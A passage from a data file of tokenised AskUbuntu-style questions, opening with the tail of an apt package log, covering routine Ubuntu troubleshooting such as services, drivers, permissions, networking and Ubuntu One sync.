( 0.7.100.3ubuntu6 , 0.7.100.3ubuntu6.1 ) , libsoup-gnome2.4-1 : amd64 ( 2.34.0-0ubuntu1 , 2.34.0-0ubuntu1.1 ) , gnome-nettool : amd64 ( 2.32.0-0ubuntu1 , 2.32.0-0ubuntu1.1 ) , gir1.2-soup-2.4 : amd64 ( 2.34.0-0ubuntu1 , 2.34.0-0ubuntu1.1 ) , gir1.2-telepathylogger-0.2 : amd64 ( 0.2.6-1ubuntu1 , 0.2.6-1ubuntu1.2 ) , gdm : amd64 ( 2.32.1-0ubuntu3 , 2.32.1-0ubuntu3.2 ) , evince-common : amd64 ( 2.32.0-0ubuntu12 , 2.32.0-0ubuntu12.2 ) , vino : amd64 ( 2.32.1-0ubuntu2 , 2.32.1-0ubuntu2.1 ) , libpoppler-glib6 : amd64 ( 0.16.4-0ubuntu1 , 0.16.4-0ubuntu1.1 ) , evince : amd64 ( 2.32.0-0ubuntu12 , 2.32.0-0ubuntu12.2 ) , nautilus-sendto : amd64 ( 2.32.0-0ubuntu1 , 2.32.0-0ubuntu1.1 ) , libpoppler13 : amd64 ( 0.16.4-0ubuntu1 , 0.16.4-0ubuntu1.1 ) , nautilus-sendto-empathy : amd64 ( 2.34.0-0ubuntu3 , 2.34.0-0ubuntu3.1 ) , file-roller : amd64 ( 2.32.1-0ubuntu4 , 2.32.2-0ubuntu0.1 ) , glib-networking : amd64 ( 2.28.5-0ubuntu1 , 2.28.6.1-0ubuntu1 ) , libsoup2.4-1 : amd64 ( 2.34.0-0ubuntu1 , 2.34.0-0ubuntu1.1 ) end-date : 2011-08-03 18:44:54 start-date : 2011-08-03 18:45:30 commandline : apt-get install ubuntu-desktop install : ubuntu-artwork : amd64 ( 53.8 ) , ubuntu-desktop : amd64 ( 1.220 ) , unity : amd64 ( 3.8.16-0ubuntu1~natty1 ) , evolution-indicator : amd64 ( 0.2.14-0ubuntu4 ) , system-config-printer-gnome : amd64 ( 1.3.1+20110222-0ubuntu16.3 ) , gnome-session : amd64 ( 2.32.1-0ubuntu20 ) , evolution-exchange : amd64 ( 2.32.2-0ubuntu3 ) , transmission-gtk : amd64 ( 2.13-0ubuntu8 ) , empathy : amd64 ( 2.34.0-0ubuntu3.1 ) , indicator-applet : amd64 ( 0.4.12-0ubuntu1 , automatic ) , software-center : amd64 ( 4.0.4 ) , banshee : amd64 ( 2.0.0-2ubuntu2 ) , gnome-codec-install : amd64 ( 0.4.7ubuntu3 ) , simple-scan : amd64 ( 2.32.0.1-0ubuntu2 ) , banshee-extension-soundmenu : amd64 ( 2.0.0-2ubuntu2 , automatic ) , indicator-applet-session : amd64 ( 0.4.12-0ubuntu1 ) , gnome-themes-ubuntu : amd64 ( 0.6.1 ) , banshee-extension-ubuntuonemusicstore : amd64 ( 2.0.0-2ubuntu2 , automatic ) , apturl : amd64 ( 0.4.2ubuntu5.1 , automatic ) , ubuntu-mono : amd64 ( 0.0.30 , automatic ) , xul-ext-ubufox : amd64 ( 0.9.1-0ubuntu0.11.04.1 ) , unity-asset-pool : amd64 ( 0.8.20-0ubuntu2 , automatic ) , pitivi : amd64 ( 0.13.5-1ubuntu4 ) , ubuntuone-client-gnome : amd64 ( 1.6.2-0ubuntu1 ) , humanity-icon-theme : amd64 ( 0.5.3.10 , automatic ) , light-themes : amd64 ( 0.1.8.13 , automatic ) end-date : 2011-08-03 18:47:38 start-date : 2011-08-03 22:40:45 install : battery-status : amd64 ( 0.1.1-0ubuntu3 ) , python-gnomeapplet : amd64 ( 2.32.0-0ubuntu2 , automatic ) end-date : 2011-08-03 22:41:52 start-date : 2011-08-06 22:35:06 commandline : apt-get install xmonad install : libghc6-utf8-string-dev : amd64 ( 0.3.6-1ubuntu2 , automatic ) , libghc6-xmonad-contrib-dev : amd64 ( 0.9.1-1ubuntu2 , automatic ) , libgmp3-dev : amd64 ( 4.3.2+dfsg-1ubuntu3 , automatic ) , libghc6-xmonad-contrib-doc : amd64 ( 0.9.1-1ubuntu2 , automatic ) , ghc6-doc : amd64 ( 6.12.3-1ubuntu7 , automatic ) , libffi-dev : amd64 ( 3.0.9-3ubuntu1 , automatic ) , libghc6-xmonad-dev : amd64 ( 0.9.1-2build4 , automatic ) , libghc6-xmonad-doc : amd64 ( 0.9.1-2build4 , automatic ) , libbsd-dev : amd64 ( 0.2.0-1 , automatic ) , libghc6-mtl-dev : amd64 ( 1.1.0.2-10build2 , automatic ) , libghc6-mtl-doc : amd64 ( 1.1.0.2-10build2 , automatic ) , libxt-dev : amd64 ( 1.0.9-1ubuntu1 , automatic ) , xmonad : amd64 ( 0.9.1-2build4 ) , ghc6-haddock : amd64 ( 6.12.3-1ubuntu7 , automatic ) , libghc6-x11-xft-dev : amd64 ( 0.3-5ubuntu1 , automatic ) , ghc6 : amd64 ( 6.12.3-1ubuntu7 , automatic ) , libghc6-x11-xft-doc : amd64 ( 0.3-5ubuntu1 , automatic ) , libghc6-x11-dev : amd64 ( 1.5.0.0-2build2 , automatic ) , libghc6-x11-doc : amd64 ( 1.5.0.0-2build2 , automatic ) end-date : 2011-08-06 22:36:49 start-date : 2011-08-06 22:49:53 commandline : apt-get install dmenu install : suckless-tools : amd64 ( 38-1 ) end-date : 2011-08-06 22:50:08 start-date : 2011-08-06 22:54:09 install : dwm : amd64 ( 5.8.2-3 ) end-date : 2011-08-06 22:56:07 start-date : 2011-08-06 23:25:14 commandline : apt-get remove xmonad remove : xmonad : amd64 ( 0.9.1-2build4 ) end-date : 2011-08-06 23:25:45 start-date : 2011-08-06 23:26:41 commandline : apt-get remove dmenu remove : suckless-tools : amd64 ( 38-1 ) end-date : 2011-08-06 23:26:47 start-date : 2011-08-07 17:20:35 commandline : apt-get install devilspie -y install : devilspie : amd64 ( 0.22-1 ) end-date : 2011-08-07 17:20:50 start-date : 2011-08-07 17:21:08 commandline : apt-get autoremove remove : libghc6-utf8-string-dev : amd64 ( 0.3.6-1ubuntu2 ) , libghc6-xmonad-contrib-dev : amd64 ( 0.9.1-1ubuntu2 ) , libgmp3-dev : amd64 ( 4.3.2+dfsg-1ubuntu3 ) , libghc6-xmonad-contrib-doc : amd64 ( 0.9.1-1ubuntu2 ) , ghc6-doc : amd64 ( 6.12.3-1ubuntu7 ) , libffi-dev : amd64 ( 3.0.9-3ubuntu1 ) , libghc6-xmonad-dev : amd64 ( 0.9.1-2build4 ) , libghc6-xmonad-doc : amd64 ( 0.9.1-2build4 ) , libbsd-dev : amd64 ( 0.2.0-1 ) , libghc6-mtl-dev : amd64 ( 1.1.0.2-10build2 ) , libghc6-mtl-doc : amd64 ( 1.1.0.2-10build2 ) , libxt-dev : amd64 ( 1.0.9-1ubuntu1 ) , ghc6-haddock : amd64 ( 6.12.3-1ubuntu7 ) , libghc6-x11-xft-dev : amd64 ( 0.3-5ubuntu1 ) , ghc6 : amd64 ( 6.12.3-1ubuntu7 ) , libghc6-x11-xft-doc : amd64 ( 0.3-5ubuntu1 ) , libghc6-x11-dev : amd64 ( 1.5.0.0-2build2 ) , libghc6-x11-doc : amd64 ( 1.5.0.0-2build2 ) end-date : 2011-08-07 17:21:38 start-date : 2011-08-08 04:44:53 install : gtkhash : amd64 ( 0.3.0-2 ) , libmhash2 : amd64 ( 0.9.9.9-1 , automatic ) end-date : 2011-08-08 04:46:03
56744	`` lock '' one specific file so that i nor root no longer have access to it any more	to combat procrastination , i edit my /etc/hosts file by adding time-wasting websites and pointing them to localhost . however , the flesh is weak and i often find myself reverting my changes . i was thinking of the following solution , but i do n't know if it is technically possible . i would ask a trusted friend to come over , create a new account with a strong password that i do n't know , change the owner and permissions of the /etc/hosts file so that only that new user can change that file and that i nor root no longer have access to it . the use case would be that i ask my friend to come over before the exam period , he changes the file and puts the procrastination blocking measures in place , and that during the time i need to study i have no way of editing the file myself . after the exam period is over , i ask him to 'unlock ' the file and i can browse freely again .
56752	how do i accept inbound connections for a specific program ?	windows firewall allows to specify a program that will accept inbound connections no matter on which port ( s ) is listening ( instead of specifying the port ( s ) to allow for that program ) . is this possible in ubuntu with the default firewall ? how ?
56753	how do i disable ssh from starting automatically ?	after installing openssh-server , the server start every time i boot . if i want it to be manual what do i need to do ? in version 0.6.7+ of upstart i would add a `` manual '' stanza to the job file . 10.04 has upstart 0.6.5-8 . what is the preferred way to disable ssh from starting automatically in this case ?
56757	how do i get the svn client to use a different copy of ssl ?	i was having an ssl issue with my svn client . i saw online that it may be due to using an old version of openssl . so i followed these instructions to build the latest version of openssl . the latest version is now in /opt/openssl/ but the old version still exists . how do i point svn to use the ssl in /opt/openssl ?
56758	anyone get sound working on a hp 8540p ?	when running 10.10 on my hp 8450p laptop , sound worked fine . i 've followed the various instructions on the main ubuntu site for debuggingsoundproblems , but nothing yet . the hardware buttons on the laptop trigger volume up/volume down , and even mute/unmute . yet , the indicator light on the laptop alwayss remain orange ( which indicates that the sound is muted ) .
56760	how to install an older version of rabbitmq on 11.04 ?	i can install the latest version of rabbitmq-server just fine using sudo apt-get install rabbitmq-server it installs version 2.3.1-1 i tried to install older versions by downloading the .deb file then installing the package sudo dpkg -i rabbitmq-server_olderversion-1_all.deb but i always get this error : not creating home directory `/var/lib/rabbitmq ' . starting rabbitmq-server : timeout - check /var/log/rabbitmq/startup_ { log , err } rabbitmq-server . invoke-rc.d : initscript rabbitmq-server , action `` start '' failed . dpkg : error processing rabbitmq-server ( -- install ) : subprocess installed post-installation script returned error exit status 1 processing triggers for man-db ... errors were encountered while processing : how can i install an older version ?
56761	force apt-get to overwrite file installed by another package	( i realize a similar question was asked before but the answers there do n't handle these details ) i 'm on ubuntu 10.10 and need both python2.5 ( coming from deadnsakes -- https : //launchpad.net/~fkrull/+archive/deadsnakes ) and python-profiler unfortunately , these two packages both try to install /usr/lib/python2.5/profile.py so apt-get wo n't allow me to install both obviously this is a packaging bug , but i need this fixed asap . is there anyway to completely ignore these errors and just blow out that file ?
56762	bash - cp difficulties	cp -r /opt/lampp/htdocs/codeigniter_2.0.2 /opt/lampp/htdocs/test/ that command is making this : /opt/lampp/htdocs/test/codeigniter_2.0.2 and i need only the content of codeigniter_2.0.2 inside test . thanks in advance for any help .
56769	ubuntu one music app for android : missing folders	the android music app does n't show many of the music folders on ubuntu one . both the available and the missing files are inside the same synched parent folder . the files are supported and drm-free ( mostly .mp3 ) the missing files and folders are visible in the ubuntu one files web interface ( i have n't tried the android file app nor synched another desktop , though ) the same thing happens when using the original subsonic android app . any ideas ? thank you very much !
56772	where is the application to reverse the color of the screen ?	in the new version of ubuntu , i can not find the application to reverse the color of my screen . it has been in the ubuntu 10 , when i pressed the button win+m or win+n , the color of the whole screen would be reserved . what 's the name of that application . can i find it in new version ?
56778	why does privoxy needs a restart at boot ?	i have an ubuntu 10.04 installed and i installed privoxy : apt-get install -y privoxy okay , it works great with my rules , fine . when i boot up my desktop pc i can see that privoxy is started , it runs , great . but when i want to view webpages through it it does n't work ( error loading page ) . but if i restart the privoxy with service privoxy restart then it works ! what could the problem be ? why do i have to restart privoxy after every boot ?
56782	is there any application for manual logging with timestamps ?	i would like to find an application or an extension for an editor that allows me to record phases of a process by entering status messages . ideally , the output would be a logfile with timestamps for each message that i 've entered . nowadays i have to test fairly complicated websites and i would like to be able to exactly know what i do in each step , so i would like to submit a status message on each step i do , much like a commit message in version control systems . do you know anything similar ?
56783	unity dash `` most frequently used '' application disappeared , how to reinstall unity & zeitgeist completely ?	my `` most frequently used '' applications in unity dash disappeared . i tried to : reset unity with unity -- reset , removing zeitgeist history with rm ~/.local/share/zeitgeist/activity.sqlite , and even reinstall zeitgeist via synaptic , but no one worked . i also used guest session to check whether it only disappeared in my account , but actually not . i do n't know why it happened . how can i get it back ? how do we reinstall unity and zeitgeist so that they really return to the state as when they are freshly installed ? thanks in advance .
56789	should i install ati propriety video drivers on ubuntu 11.04 on my dell inspiron 9100 ?	i have a dell laptop , inspiron 9100 , with a ati technologies inc rv350 [ mobility radeon 9600 m10 ] video card . the video performance has always been pretty poor in ubuntu . though slightly improved in 11.04 . symptoms are video tearing on full screen , stuttering images due to low refresh rates . i have read about the ati propriety drivers with catalyst . on the web there seems to be those for and against propriety drivers and also some problems ( sometimes serious ) after installing the propriety drivers . would you recommend it ? will it help video performance ? what are the risks ( i.e . will i end up with a blank-screened brick ) ?
56792	how to copy only file attributes ( metadata ) without actual content of the file ?	i 've already copied terabytes of files with rsync but i forgot to use -- archive to preserve files ' special attributes . i tried executing rsync again this time with -- archive but it was way slower than what i expected . is there any easy way to do this faster by just copying metadata recursively ?
56800	desktop search engine for 11.04	just as the title says i 'm searching for a great desktop search engine with nice unity integration . beagle used to be cool but for some reason it has been discontinued so it is out of the question . finally the recommended app must be very fast when rendering search results
56802	how to change the signature color in thunderbird ?	i have seen that html signature in thunderbird will be shown as grey color . even though my signature is not in grey color the default grey color will be shown . how to resolve this issue ?
56815	silverlight/ moonlight with firefox 5 ?	is there a solution to get these things working in natty with firefox 5 with firefox 3.6 everything was fine , but now with the firefox updates the moonlight add-on isnt working anymore . how can i fix this ?
56817	usb mouse stops working after unplugging the power cord in ubuntu laptop	i have been using ubuntu 11.04 for almost a month without any issue . but now its showing a weird behavior . when i unplug the power cord from my laptop running ubuntu 11.04 , the external usb mouse stops working even if the laptop is fully charged . again after plugging the power cord it starts working . please help what to do .
56830	too long filenames or missformat ?	i tried to sync from local to ubuntu one files with filenames as : '' 176 - deutsche geschichte - ein versuch vol 05-von der revolution bis zum drei�igj�hrigen krieg - 01.mp3 ( ungültige kodierung ) '' ubuntu one sync breaks on this filenames and nautilus is shutting down the local filebrowser window by itself . are these filenames too long for ubuntu one ? or is it the ( ungültige kodierung ) ( mis encoded ) at the end of the file ?
56831	smart phone sync issue	i am trying to sync podcasts from banshee to my android phone ( htc desire ) . it seems that about 75 % of the time when i plug the phone in ubuntu mounts the disk read only , though the mount command says it is read/write . what is more frustrating is that often it will start , copy over a few podcasts and then the phone 's sd card will suddenly become read only and syncing will stop . what i really want is to have banshee auto download my podcasts and then copy the new episodes onto my phone when i plug it in . if using a different podcatcher would work better that would be fine too .
56832	border between monitors	in a dual-monitor setup , moving a window on the left screen to the right side will have a ( small ) `` block '' when the window aligns with the left screen 's right border . this is useful to position a window at the right-hand side of the left screen . now , my left monitor is my primary screen so i have the panels on the left-hand screen . moving the mouse to the top-right corner where the user menu including logoff/shutdown is , is not so easy because unless i navigate very carefully i usually end up with my mouse on the right screen and have to backtrack . is there a feature ( i am using gnome3 , btw ) that allows me to set up some kind of border between the two screens so that it will take just a little bit more effort to move the mouse from left to right screen ?
56833	how do i setup a redirect/alias for the ubuntu wiki ?	i have a wiki page that i 'd like to setup a redirect ( or an alias ) . i have http : //wiki.ubuntu.com/libreoffice , and i 'd like to have http : //wiki.ubuntu.com/libreoffice be a re-direct . also , is there a reason that the ubuntu wiki is so case-sensitive ?
56839	backup and restore development files ?	i started with ubuntu with a small partition and i 'm running out of space . i 'm planning to dump windows altogether and use my full disk for ubuntu ( also , doing a clean install for once ) , but i need help before doing so because i have web development projects going on , which i 'll need to continue after reinstalling . i 'm currently using ruby , rvm , heroku and git . my git repos are backed up in dropbox , but , how can i backup my ruby version , with rvm and heroku ssh keys ? and after reinstalling , how do i restore these configs in my new running system ?
56841	gpg ca n't check signature	i was trying to recompile and rebuild libevent2 source from oneiric on my natty server and i had a small error with gpg not being able to check signature # dpkg-source -x libevent_2.0.12-stable-1.dsc gpgv : signature made fri jun 17 07:12:50 2011 pdt using dsa key id 7adf9466 gpgv : ca n't check signature : public key not found dpkg-source : warning : failed to verify signature on ./libevent_2.0.12-stable-1.dsc any idea how to fix this warning ?
56843	could not mount /dev/mapper/cryptswap1	i have just had a major issue with my ubuntu 11.04 natty which i think is going to end up in a reinstall : - ( this is problem one of two so i 've put them as two questions . for some unknown reason i had a distribution update on my laptop yesterday which for all intend and purposes did nothing . no major version changes except in evolution and libreoffice plus some of the gnome environment ( my other question ) . now , whenever i boot my machine i receive this message could not mount /dev/mapper/cryptswap1 m for manual s for skip what would have caused this error and what on earth is cryptswap1 ? # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=c3cff8dd-1bf2-4618-8801-761b335c8d38 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation # uuid=fe10641d-a928-479e-ab3a-b0706b97b601 none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 sudo blkid | grep swap /dev/mapper/cryptswap1 : type : '' swap '' crypttab # < target name > < source device > < key file > < options > ls -l /dev/mapper total 0 crw -- -- -- - 1 root root 10 , 236 2011-08-16 05:28 control filename type size used priority /dev/sda5 partition 1038332 86760 -1
56850	how does application review board work ?	according to https : //wiki.ubuntu.com/appreviews the application review process is good both for upstream software developers and ubuntu packagers . the point seems to be that the upstream developers have the advantage of getting their apps into the software center sooner and easier , while they help the ubuntu package managers by preparing their application for packaging . this seems to be a great deal . the instruction on wiki states that a developer fulfills some steps listed there , including uploading the application to a ppa , and requests review , and after some time it is reviewed , and accepted & included to ubuntu repositories , or not accepted at all . although this looks like a simple , fair way to quickly add an application to the software center , i think i am missing something . i have noticed , that while there are some requests pending , there is no ( or barely any ) activity there . everything seems as if it was frozen about 5-6 months ago , and it smells a bit abandoned . did i understand anything wrong , and everything is okay ( maybe for example they are being reviewed only at the uds ? ) , or did something change ? could anyone explain me clearly , how exactly this process of reviews ( and inclusion in repositories ) works ?
56851	catch dbus notification before it displaying	how to catch dbus notification before it displaying . using python .
56852	ca n't delete/edit files on my pendrive	i 'm trying to delete the .trash-1000 from my pen drive , but with sudo rm -rf .trash-1000/ i got rm : can not remove `.trash-1000/expunged/2660089871/apps.log ' : read-only file system ( one line of this for each file within .trash-1000/ ) i found this similar question , but i still got the same result after running : sudo mount -o remount , rw '/media/sgtl mscn' sudo rm -rf .trash-1000 so , any idea how to remove this folder ( or its content ) ? by the way , i need to remove it because i 'm using the pen drive to test a software , and there 's a file there that should not be found in the pen drive . -- update i thought it was corrupted , like allan pointed , but the same just happened to another new pen drive i plugged here.. after use it on vmware ( in a new os that still do n't have a name ) , and go back to ubuntu , i can no more edit it 's files , nither make a filesystem check or format it .
56853	splitting a pdf page in two	i have a pdf file that was the result of the scan of a book . in this file 2 pages of the book correspond to 1 in the pdf . so when i see a page in the pdf file i 'm actually seeing 2 pages of the book . ( original ) i would like to know if there 's any way to convert this file to another pdf where 1 page of the book corresponds to 1 page of the pdf i.e . the normal situation .
56855	ethernet disconnected , shows up in ifconfig	i am running 11.04 , no remix . after installation , i could use wireless networks , but not ethernet . when i click on the connections menu item , it says wired network disconnected how do i fix this ? here is the ethernet portion of ifconfig : eth0 link encap : ethernet hwaddr 00:16:36:86 : f3:43 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:17 and the result of lspci : 00:00.0 host bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 01 ) 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 01 ) 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 01 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 01 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 01 ) 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 01 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 01 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e1 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 01 ) 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 01 ) 02:00.0 ethernet controller : broadcom corporation netxtreme bcm5788 gigabit ethernet ( rev 03 ) 02:09.0 cardbus bridge : texas instruments pcixx12 cardbus controller 02:09.1 firewire ( ieee 1394 ) : texas instruments pcixx12 ohci compliant ieee 1394 host controller 02:09.4 communication controller : texas instruments pcixx12 gemcore based smartcard controller 08:00.0 network controller : intel corporation pro/wireless 3945abg [ golan ] net my /etc/network/interfaces looks like this : auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp and i get no output from sudo ifconfig eth0 up . output from nm-applet : ** ( nm-applet:1824 ) : debug : old state indicates that this was not a disconnect 0 ** ( nm-applet:1824 ) : debug : old state indicates that this was not a disconnect 0 on second run of nm-applet : ** ( nm-applet:2752 ) : debug : old state indicates that this was not a disconnect 0 ** ( nm-applet:2752 ) : debug : old state indicates that this was not a disconnect 0 ** ( nm-applet:2752 ) : warning ** : _nm_object_get_property : error getting 'wpaflags ' for /org/freedesktop/networkmanager/accesspoint/10 : ( 19 ) method `` get '' with signature `` ss '' on interface `` org.freedesktop.dbus.properties '' does n't exist ** ( nm-applet:2752 ) : warning ** : _nm_object_get_property : error getting 'rsnflags ' for /org/freedesktop/networkmanager/accesspoint/10 : ( 19 ) method `` get '' with signature `` ss '' on interface `` org.freedesktop.dbus.properties '' does n't exist ** ( nm-applet:2752 ) : warning ** : error in getting active connection 'vpn ' property : ( 19 ) method `` get '' with signature `` ss '' on interface `` org.freedesktop.dbus.properties '' does n't exist ** ( nm-applet:2752 ) : warning ** : _nm_object_array_demarshal : could n't create object for /org/freedesktop/networkmanager/activeconnection/0 ** message : < info > no keyring secrets found for auto heyjude88/802-11-wireless-security ; asking user . ** ( nm-applet:2752 ) : warning ** : applet.c.2882 ( applet_settings_new_secrets_requested_cb ) : could n't find details for connection ** message : < info > no keyring secrets found for auto heyjude88/802-11-wireless-security ; asking user . ** ( nm-applet:2752 ) : debug : going for offline with icon : notification-network-wireless-disconnected ** ( nm-applet:2752 ) : debug : foo_client_state_changed_cb ** ( nm-applet:2752 ) : debug : foo_client_state_changed_cb ** ( nm-applet:2752 ) : debug : foo_client_state_changed_cb ** ( nm-applet:2752 ) : debug : going for offline with icon : notification-network-wireless-disconnected ** ( nm-applet:2752 ) : debug : foo_client_state_changed_cb here 's more to ifconfig : wlan0 link encap : ethernet hwaddr 00:18 : de:31:70:20 inet addr:172.16.6.210 bcast:172.16.6.255 mask:255.255.255.0 inet6 addr : fe80 : :218 : deff : fe31:7020/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2384 errors:0 dropped:0 overruns:0 frame:0 tx packets:1367 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:514654 ( 514.6 kb ) tx bytes:215138 ( 215.1 kb )
56864	nvidia gt 540m problem , wo n't install drivers	i 'm new here , and i 'm not very good at tech ... . so help me here . the drivers i downloaded from nvidia 's website wo n't install , even after i boot into terminal only . after sudo gdm stop it does n't do anything , but only says could not recognize name ; bailing out or something like that . after i run the nvidia.run driver file , it says i need to remove xserver help please !
56869	should i put /var in a separate partition for a database server ?	i will be using a ubuntu server install as a server for a mysql database . is there any benefit to having /var in a separate partition from the root file system ?
56876	chromium instances running as root	using lubuntu and its task manager ( lxtask ) i noticed that some instances of chromium are running as user root . i was kinda shocked because i am always reading only system relevant software should run with root privileges . i have been googling like crazy about this but found nothing.only some older stuff about people who wanted to run chromium/chrome as root ! ? so i 'm thinking this is the way it is supposed to be ? but why ? firefox is running only one instance as the user who invoked it . ( i get the reason for chrome 's multiple processes . i 've read it on their site . ) can anybody clear this up for me , it really bugs me and prevents me from using chromium ? i would really appreciate it ! thanks in advance . this is the output of ps -ef | grep -i chromium : myname @ xyxyxy : ~ $ ps -ef | grep -i chromium myname 1785 1 0 23:03 ? 00:00:02 /usr/lib/chromium-browser/chromium-browser myname 1788 1785 0 23:03 ? 00:00:00 /usr/lib/chromium-browser/chromium-browser myname 1790 1 0 23:03 ? 00:00:00 /usr/lib/chromium-browser/chromium-browser -- type=zygote myname 1813 1790 0 23:03 ? 00:00:00 /usr/lib/chromium-browser/chromium-browser -- type=renderer well , no root processes . i am more confused . here is a link to the lxtask screenshot lxtask sorry for the smudge . i am a little paranoid , hence the fuzz : ) so , is it just lxtask showing the wrong thing ? sorry for the long stayaway but i had to sleep.thank you fossfreedom for clearing this up . i am much calmer now . the 'ps -ef | grep ' did exactly what you said.i will try to report it as a bug . thanks also @ lekensteyn . oh , and also @ cyrex for embedding the pic .
56877	how can i stop my webkit browsers ( except chrom ( ium/e ) start libreoffice and acrobat when loading plugins ?	recently i 've found a problem with my webkit browsers ( midori , liferea 's browser tab/feed preview , etc ) . when loading plugins ( which is on start up for midori ) , adobe acrobat 's splash screen pops up , followed by libreoffice . i do n't know what made it start happening but i think it happened after i ( temporarily ) installed flash player 32bit . i would like this problem to go away as it can be rather annoying . what can i do ? seems to have partly fixed itself , in that when you start the browser the plugins wo n't load automatically , but they still load ( all of them ) when you open just 1 .
56880	unity only works the first boot	ubuntu 11.04 unity works fine when booted to try out from cd . after install , unity works the first login but not after that . classic does n't work either . i can only use classic no-effects . why does unity only work when booted from cd ? i have an inspiron 1721 , amd turion 64 , ati radeon graphics . btw : ubuntu 10.04 worked fine .
56881	how to get deskbar-applet in xubuntu ?	how to get deskbar-applet in xubuntu ? or is there any alternative box where i can type for programs/files and they appear ? i 've installed deskbar-applet but i do n't think i can pin it to the xubuntu panel .
56882	can ubuntu one bookmarks sync work in firefox 5 ?	in firefox 5.0 on ubuntu 11.04 , bindwood is disabled as `` incompatible with ff 5.0 '' . the xpi on launchpad ca n't be installed for the same reason . i 'm aware of various bug reports concerning bookmark sync , and indeed i never actually got it working in earlier versions of ubuntu and firefox , but this bindwood incompatibility seems to close off any prospect of getting it working . i know about firefox 's own sync , too , but i 'd rather get ubuntu one 's working , partly so as not to have to set up yet another account . is a fix being worked on , or am i missing something ? i had thought the latest ubuntu would offer the best chance of working bookmarks sync . looks as though firefox 's built-in sync may be the answer , after all . expecially as , following another routine upgrade , i 'm now using firefox 6 . that 's too bad - but i guess ubuntu could argue it 's not worth their while to duplicate something that now works in firefox .
56883	is having the 'swap ' partition at the 'beginning ' better than at the 'end ' ?	i recently installed ubuntu 11.04 onto a raid0 ( stripe ) device using the alternate installation disc and manually partitioned the hds ext4 and swap partitions ; during this process , i was reading in a forum walkthrough ( ca n't remember where ... ) that having the swap partition at the beginning of your hard drive could be better for some reason ! is the idea that the swap is `` closer '' at the beginning so its accessed quicker with a lower latency/delay ? the hd 'needle ' moves less to reach the swap ... this confuses me because i like to think of hard drives as likened to a samurai sword ( not literally ) ! i was told that the last inch or two at the tip of the sword is the cutting edge because it travels the fastest . ( think of a ball on a string and as you swing it around the ball at the end of the string is travelling at a greater speed than it would be if it was closer to the source - your hand ) but since the hd is spinning at ( x ) rpm then the outer edge of that hd should be spinning relatively faster ( +x ) providing quicker read/write rate . so does the swap position affect performance in anyway ? if so , is it better to have it placed in the beginning for immediate access , or at the end for increased read/write ? i would think the swap is sized and placed according to the individuals needs but how do i decide ... edit : as a note , i do have 8gb of ram ( 4x2gb ) so i noticed that the swap has not been used in any of my gis ( mapping and analysis ) processing . 8gb is the full capacity for my motherboard .
56887	how to prevent svnserve from overwriting svn repository permissions ?	some coworkers and i are accessing svn repositories through ssh . in order to make the repositories readable and writable to all of our accounts , we have created a group called `` developers '' and made each repository owned by that group . however when one of us commits , certain files in the repositories have their permissions changed from adminuser : developers to user1 : user1 . this prevents any of the other users from committing to the same repository . i have worked around this problem before , but i forgot how i did it . i have heard the `` wrapper '' idea , which involves writing a wrapper script for svnserve that changes the umask to 002 and then executes the actual svnserve binary . but that does n't seem to be working for me now . how do i go about fixing this problem ?
56890	ipv6 over pppoe ?	what is the best way to be able to get ipv6 addresses over pppoe ? i currently use nm-applet to get internet service from my isp , but it has no ipv6 tab on pppoe connections . i would n't mind using some command line tool , but it would be nice to transfer my settings from nm-applet to whatever tool if i have to do that .
56896	how to start , stop , restart a service	back some versions ago , when i wanted to restart , stop , start a sevice i would do something similar to this : sudo /etc/init.d/apache2 stop to stop the apache service sudo /etc/init.d/networking start to start the networking service etc ... but now it has changed . how can i start , stop , restart any service in the latest ubuntu with the new way .
56897	what does each of these network services do	i have the services listed in the /etc/init.d folder starting with 'network ' : cyrex @ cyrex : /etc/init.d $ ls network* networking network-interface-security network-interface network-manager what does each of these do . for example which one is related to the gui version of network manager , which one will drop network support for all network cards .
56900	ubuntu one upload restarts	i 'm having some trouble with ubuntu one . i 'm trying to upload a file to ubuntu one for the first time and the transfer always starts again from the beginning . the file is about 500mb and ubuntu one gets to 800kb - 1.5mb before it restarts the transfer mysteriously . i 'm using the command u1sdtool -- current-transfers to indicate how much of the transfer is completed . i 've tried u1sdtool -- status and it does n't show any errors or problems . i 'm on a wireless network and i will try a wired connection but i was under the impression that ubuntu one handled network re-connections so i thought this might be worth looking into regardless . if anyone has any suggestions on how i can identify why it is restarting that would be great . also , if it helps my account is ubctoad and this problem appears to be very similar to ubuntu one restarts sync every 5 min .
56901	ca n't find a launcher for lmms	since upgrading to natty i ca n't find lmms ( linux multimedia studio ) . i 've attempted to reinstall from terminal , but it tells me it is already the latest version .
